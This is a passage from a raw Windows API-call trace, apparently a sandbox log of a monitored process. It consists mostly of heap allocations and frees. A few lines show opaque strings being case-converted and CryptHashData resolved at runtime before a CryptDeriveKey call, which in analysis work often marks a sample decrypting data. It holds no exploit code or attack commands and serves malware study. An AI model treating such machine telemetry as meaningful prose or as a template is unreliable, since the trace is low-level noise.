returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.364] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.364] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.365] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.365] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.365] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0088.365] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69670 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.366] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0088.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0088.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9d00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0088.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0088.367] GetProcAddress (hModule=0x76390000, lpProcName="CryptHashData") returned 0x763aeef0 [0088.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0088.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0088.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0088.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0088.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0088.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0088.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.367] CryptHashData (hHash=0x9a3b80, pbData=0x2a71a78, dwDataLen=0x3, dwFlags=0x1) returned 1 [0088.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0088.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7040 [0088.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0088.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0088.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0088.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0088.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0088.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0088.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0088.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0088.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0088.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7220 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69a90 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0088.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0088.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0088.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0088.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a60 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0088.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0088.370] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0088.370] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0088.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0088.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0088.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0088.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0088.373] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0088.374] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.374] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0088.374] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0088.374] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0088.374] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0088.374] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.374] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0088.374] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0088.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0088.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0088.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0088.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf) returned 0x2aa9dd8 [0088.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9dd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0088.375] CryptDeriveKey (in: hProv=0x9961a8, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4280) returned 1 [0088.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0088.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0088.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0088.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 